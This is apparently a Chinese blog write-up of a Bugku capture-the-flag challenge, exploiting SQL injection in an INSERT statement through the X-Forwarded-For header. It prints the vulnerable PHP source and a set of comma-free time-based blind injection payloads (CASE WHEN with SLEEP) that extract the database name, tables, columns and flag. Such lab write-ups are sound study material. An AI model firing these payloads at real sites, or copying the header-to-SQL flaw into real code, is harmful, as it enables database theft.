[Bugku] INSERT INTO注入

最近要复习基础,又回顾了一把sqli-labs结果发现还是有一些奇技淫巧没有收录进去,正好想起来bugku上有一道insert注入的题,特地写一写,记录一下。

开局送源码,hint是用python写个脚本吧。盲猜这个题得盲注了不然其他注入也不太用得上写脚本。

error_reporting(0);
function getIp()
{
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

明确注入点,是走的http报头的x-forwarded-for。 但是过滤了,所以常规update和extractvalue的报错注入就没法用了。好在还有一个select case when xxx then xxx else xxx end;

而且由于逗号被过滤,导致substrsubstring无法正常使用,所以得用 from 1 for 1 替代

开始先手注测试,抓包在请求头中加入X-Forwarded-For

X-Forwarded-For:127.0.0.1' and (select case when (length(database())=5) then sleep(5) else 1 end) and '1'='1

手测测出数据库长度为5,接下来写个通用注入语句就可以跑了.

payload如下:

127.0.0.1' and (select case when (ascii(substr((select database()) from 1 for 1))=119) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(table_name)from information_schema.tables where table_schema=database()))=14) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(column_name)from information_schema.columns where table_name='flag'))=4) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag') from 1 for 1))=102) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(flag)from flag))=32) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(flag)from flag) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1

所有的payload都写出来了,脚本就容易了,利用二分法,在header里面添加X-Forwarded-Forpayload赋值。

最后修改:2020 年 08 月 12 日 10 : 34 AM
请作者喝杯奶茶吧~